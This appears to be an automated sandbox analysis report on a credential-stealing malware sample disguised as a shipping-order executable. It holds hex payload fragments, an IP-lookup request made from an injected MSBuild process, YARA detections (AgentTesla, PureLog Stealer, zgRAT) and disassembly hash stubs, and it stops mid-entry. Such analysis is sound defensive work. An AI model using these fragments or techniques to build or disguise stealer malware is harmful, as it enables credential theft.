                                                            Data Ascii: 00, 0xFE, 0x0C, 0x03, 0x00, 0x20, 0x01, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x39, 0x16, 0x00, 0x00, 0x00, 0xFE, 0x09, 0x00, 0x00, 0x7B, 0x7F, 0x00, 0x00, 0x04, 0xFE, 0x0E, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x00, 0xFE, 0x0E, 0x03, 0x00, 0x00, 0xFE, 0x0C, 0x03,
                                                            2024-04-20 04:47:58 UTC16384INData Raw: 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 31 33 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 36 2c 20 30 78 36 46 2c 20 30 78 36 39 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 36 2c 20 30 78 32 30 2c 20 30 78 31 38 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 31 2c 20 30 78 33 39 2c 20 30 78 30 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 37 38 2c 20 30 78 30
                                                            Data Ascii: 0xFE, 0x0C, 0x00, 0x00, 0x73, 0x13, 0x01, 0x00, 0x06, 0x6F, 0x69, 0x01, 0x00, 0x06, 0x20, 0x18, 0x00, 0x00, 0x00, 0xFE, 0x0E, 0x01, 0x00, 0x00, 0xFE, 0x0C, 0x01, 0x00, 0x20, 0x01, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x39, 0x0E, 0x00, 0x00, 0x00, 0x28, 0x78, 0x0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449732172.67.74.1524436816C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-20 04:48:01 UTC155OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: api.ipify.org
                                                            Connection: Keep-Alive
                                                            2024-04-20 04:48:01 UTC211INHTTP/1.1 200 OK
                                                            Date: Sat, 20 Apr 2024 04:48:01 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 12
                                                            Connection: close
                                                            Vary: Origin
                                                            CF-Cache-Status: DYNAMIC
                                                            Server: cloudflare
                                                            CF-RAY: 87727fe84d881d80-ATL
                                                            2024-04-20 04:48:01 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                            Data Ascii: 81.181.57.52


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:06:47:53
                                                            Start date:20/04/2024
                                                            Path:C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe"
                                                            Imagebase:0xd00000
                                                            File size:189'952 bytes
                                                            MD5 hash:5A9BF748B2B3431B39E5A8FEA6FEAA80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2011142361.0000000013011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2011142361.0000000013382000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2011142361.0000000013382000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:06:47:59
                                                            Start date:20/04/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            Imagebase:0x6f0000
                                                            File size:262'432 bytes
                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4105077153.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4105077153.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4097776387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4097776387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4105077153.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:4
                                                            Start time:06:48:00
                                                            Start date:20/04/2024
                                                            Path:C:\Windows\System32\WerFault.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 6424 -s 2408
                                                            Imagebase:0x7ff7969d0000
                                                            File size:570'736 bytes
                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FFD9B8A9F40 Relevance: 1.3, Instructions: 1299COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d4befc19fcce65bf6c1e133b98b01f524ca83f688cd65684cd55d96affc7e9fd
                                                              • Instruction ID: 6218c156d9cbdf3587089a3245aaa38335d71b94e8c49ec82773055752fa0372
                                                              • Opcode Fuzzy Hash: d4befc19fcce65bf6c1e133b98b01f524ca83f688cd65684cd55d96affc7e9fd
                                                              • Instruction Fuzzy Hash: 86C2B570E09A1D8FDBA8DB58C895BA8B7B1FF59300F5041E9D01DE72A5DA34AE81CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A08ED Relevance: .5, Instructions: 529COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a23f42dd309b013b99681dd038a58d15f46177eb58e6381f56ed177e6feff603
                                                              • Instruction ID: 1976e90ae27126074010d30980eb2e2aaccc9d5b7e72e5fc49dca95e0b5b00b6
                                                              • Opcode Fuzzy Hash: a23f42dd309b013b99681dd038a58d15f46177eb58e6381f56ed177e6feff603
                                                              • Instruction Fuzzy Hash: 81120B71E19A1D8FDBA4EB58C865BE8B7B1FF58701F1101EAD04DE32A1DE356A81CB10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A3040 Relevance: .5, Instructions: 458COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52a354530efc6d63c043183d1672850fb66e86d3f7f5c2bc1d30fc33173ee250
                                                              • Instruction ID: 6faaf39612772e85d9dbfda1268eb2d4e46805ab71e8235c5fbdb8bc10af0cd3
                                                              • Opcode Fuzzy Hash: 52a354530efc6d63c043183d1672850fb66e86d3f7f5c2bc1d30fc33173ee250
                                                              • Instruction Fuzzy Hash: 74B10B22F1DE5E0BEBBC975C64656B963C2EBDC760B0501BBD40DC32DAED18AD424390
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A1831 Relevance: .3, Instructions: 291COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b0731a4f7877f6a7a96f1e12a9d32b72fe9feb5a3cb34684895a7f90af16ccd0
                                                              • Instruction ID: efaa3f9512f670bf2447097941db3e3c8e36bd2f0a62058de7fa77c20447638b
                                                              • Opcode Fuzzy Hash: b0731a4f7877f6a7a96f1e12a9d32b72fe9feb5a3cb34684895a7f90af16ccd0
                                                              • Instruction Fuzzy Hash: 10A17E70A19A4E8FDF98EF58C8A4AEDB7B2FF59300F50016AD41DD7295CB35A942CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A51F2 Relevance: .3, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 421593f55b150c2144e09a701dcc7e877e1c1714219fbfc175c40942afd01f98
                                                              • Instruction ID: db6e23093d8e18fc06c42535139623085664ae34875af43a4f2c686399a39281
                                                              • Opcode Fuzzy Hash: 421593f55b150c2144e09a701dcc7e877e1c1714219fbfc175c40942afd01f98
                                                              • Instruction Fuzzy Hash: 2F818E33F0E66A4FE715EBACEC669EC3BA0EF96321B090177C048C71A3DD1964468791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A3060 Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d0039186c1823e93a103cf8179903aa1eb1ee559a16d8e7ea7ad7b3241e33414
                                                              • Instruction ID: 8255126fd779afbe706eec4895a0175c200415139c347673c4a73df3e018311a
                                                              • Opcode Fuzzy Hash: d0039186c1823e93a103cf8179903aa1eb1ee559a16d8e7ea7ad7b3241e33414
                                                              • Instruction Fuzzy Hash: 8191B271E0DA4D4FDB98DBA898656AD77F2FF9C300F15017AE04DE32A2DA245A01C761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8AB6FA Relevance: .3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d5dd97ebc10dac194b6a9375ad299d8c1f7be0b6d2c3348ef94afb711cf7d657
                                                              • Instruction ID: 8cc8523317d001238d5bc9c294f43dcc3b240c6cc0408f12daac9c43416877af
                                                              • Opcode Fuzzy Hash: d5dd97ebc10dac194b6a9375ad299d8c1f7be0b6d2c3348ef94afb711cf7d657
                                                              • Instruction Fuzzy Hash: 3611BF30A0E68E8FDB91DF68C8649B97BA0FF29300F04066AC459C71B1DB74A954CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8AE191 Relevance: .3, Instructions: 252COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7829c78524e361171cf3e05f038d14aa676898a224ca871c5c594195795564a
                                                              • Instruction ID: 13f7579366cefb90ffe3163529e4c1f1d48e16e8d198c31ac6b77d7217fe88bb
                                                              • Opcode Fuzzy Hash: c7829c78524e361171cf3e05f038d14aa676898a224ca871c5c594195795564a
                                                              • Instruction Fuzzy Hash: E3813932E0965E8FEB51EFACD8A59E97BB0FF09315B0405B7D048C70A3DA346505CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A4A74 Relevance: .2, Instructions: 241COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff7cd9070248ae826687acc7855ec39197d4a94fc0d058e4bb15258551c0f6f4
                                                              • Instruction ID: 0e64161977dc57a5658e4a8a055b6044d053187e52b26ac3ff2aad9344a8d5aa
                                                              • Opcode Fuzzy Hash: ff7cd9070248ae826687acc7855ec39197d4a94fc0d058e4bb15258551c0f6f4
                                                              • Instruction Fuzzy Hash: 0991CD30A096198FDBA6EF18C8A1B9973B2FF59348F5045E8D04DD3299CB35AD95CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A443D Relevance: .2, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1ea3212ac719be6dbc64a3bd7f45223a6de7c496db87787b0372a1b4b2d487f
                                                              • Instruction ID: e8a5db8b1449d9f4e75ec8218d4d9aca01a54c42c3e0df25e7feab296920d377
                                                              • Opcode Fuzzy Hash: c1ea3212ac719be6dbc64a3bd7f45223a6de7c496db87787b0372a1b4b2d487f
                                                              • Instruction Fuzzy Hash: B6813D30A0A51D8FDBA5EF28C891BA973B1EB59348F6044B8D04DD3299CF36AD95CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A5864 Relevance: .2, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 488b7ba796ddce8ad769d1aa2765401dd6ac6935a111c53df83d95d28bd00e4f
                                                              • Instruction ID: 5831919180b5180e467797bd2e28f11c07c9290e3ba3e823e93f26482262b36f
                                                              • Opcode Fuzzy Hash: 488b7ba796ddce8ad769d1aa2765401dd6ac6935a111c53df83d95d28bd00e4f
                                                              • Instruction Fuzzy Hash: 1A71C271A19A8D8FFB54DBA8D8657EDBBE0FF59340F4401BAD04CD72E6DA282842C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A29B6 Relevance: .2, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 283692ad5f87dc2d4f020ae82662a2920227ffa675cc61bb4d45885b1ccaaeae
                                                              • Instruction ID: 716b1a16475bbe59890814935b228354006acd691f4eb96379a116d16830c1ae
                                                              • Opcode Fuzzy Hash: 283692ad5f87dc2d4f020ae82662a2920227ffa675cc61bb4d45885b1ccaaeae
                                                              • Instruction Fuzzy Hash: E751E331E0DB4C4FDB58EF9898456E97BE1FF98310F04826BD44D93256DA34A985CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A4089 Relevance: .2, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8734da3187181e4e82a5fe49acd1ee892f28f7a872e5bb2a0821523c1496c65a
                                                              • Instruction ID: 69b792c1bfbce043a048ca30bb5e1a32e7c5a116e1a2e11cd755de94026b2098
                                                              • Opcode Fuzzy Hash: 8734da3187181e4e82a5fe49acd1ee892f28f7a872e5bb2a0821523c1496c65a
                                                              • Instruction Fuzzy Hash: B641A131719A098FDFE4DB6CD4A5A617BE1FFA930071906BDD44DC72A2DA24E842CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A32FA Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a090b6ad520898495abfdb267cc4a2c6e91c6aff9b9d2e76f4e1405e1446e98c
                                                              • Instruction ID: 43efb0174d5652e146236a02db9a749ac17c885c6529c375f88302a46da9d79d
                                                              • Opcode Fuzzy Hash: a090b6ad520898495abfdb267cc4a2c6e91c6aff9b9d2e76f4e1405e1446e98c
                                                              • Instruction Fuzzy Hash: 26415A33F0E5998FE715AB9CBCA60ED7B60EF85361F1401BBD94887097ED2669098350
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A34A1 Relevance: .1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7db73dc896e7299b1f9bf2471bc8a32162434c0bab2eb3506c7fa5ecdbe1a2cf
                                                              • Instruction ID: 8b31dd47f8e62d60c4a81bda5784bfc482dde050daa8838b0b0f5537439d6e5f
                                                              • Opcode Fuzzy Hash: 7db73dc896e7299b1f9bf2471bc8a32162434c0bab2eb3506c7fa5ecdbe1a2cf
                                                              • Instruction Fuzzy Hash: 6B418E71E09A5D8FEF94EF98D895AECBBF1FF68340F040166D009E32A5DB34A8458750
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A4EE1 Relevance: .1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1008857d87c30ec4d775d1f691e966e3fcd23a8722bf71ff00990391c7edd0a0
                                                              • Instruction ID: bc0d88d933403b26a1a669fbf96a8fa26a06e9229da2cfb017fc96430ea1f9b0
                                                              • Opcode Fuzzy Hash: 1008857d87c30ec4d775d1f691e966e3fcd23a8722bf71ff00990391c7edd0a0
                                                              • Instruction Fuzzy Hash: 5931D432A4D2A55FD3176BB4BC264E53BB0DF46235B0941F7D0D8CA4E3E91C218AC3A6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A0490 Relevance: .1, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b54b0f0e75359f95dde1b0116e78cd84350f1e48a9d88120fd3fa31b0ccfd6b
                                                              • Instruction ID: 91b0aaa196cd70eb1e37d77d1548f464f2c6ab0cf088d581d1e00c3b2f5199c3
                                                              • Opcode Fuzzy Hash: 7b54b0f0e75359f95dde1b0116e78cd84350f1e48a9d88120fd3fa31b0ccfd6b
                                                              • Instruction Fuzzy Hash: EC316D31E0995D9FDB94EF9CD899AEDB7F1FB6C740F00012AE019E3295DB34A9418750
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A1328 Relevance: .1, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68b1536efc70e2253835d6f2daa6191e339085cf7226a8edcdeeb97137c04b09
                                                              • Instruction ID: 975da95e617c8998deef642d50b0e99da4ae8f4f1063b3d8eacacd6df046f274
                                                              • Opcode Fuzzy Hash: 68b1536efc70e2253835d6f2daa6191e339085cf7226a8edcdeeb97137c04b09
                                                              • Instruction Fuzzy Hash: A7415F71A1994E8FDF88EF98D855AEDB7B1FF98300F10017AD419E3295DA34A942CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A0558 Relevance: .1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a616e87f235e5ecfe793fa01475fbe7cbc7081978a0d99ab70d8e28701f32e0
                                                              • Instruction ID: 2c4b112b92763d3d1a777be07eba150df057b97116c09181a65ecd50290da00b
                                                              • Opcode Fuzzy Hash: 2a616e87f235e5ecfe793fa01475fbe7cbc7081978a0d99ab70d8e28701f32e0
                                                              • Instruction Fuzzy Hash: F9310E71A1494E8FDF98EF58D855EFEB7B1FF98300F10016AE519E3295DA34A981CB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A0E79 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c4e5393ca7813fce6ae862a3b38da21c7b51fd39d7dcf335b091ad0a3dcca3d
                                                              • Instruction ID: a195e292f699d85c87899c83bec231b27e433edb3cae75739c37d19921dbc6d4
                                                              • Opcode Fuzzy Hash: 7c4e5393ca7813fce6ae862a3b38da21c7b51fd39d7dcf335b091ad0a3dcca3d
                                                              • Instruction Fuzzy Hash: 4011543195E2CE1FD7529B648C229EA7FB0EF06310F0542E7E05CC70E7CA286696C361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8AE39D Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
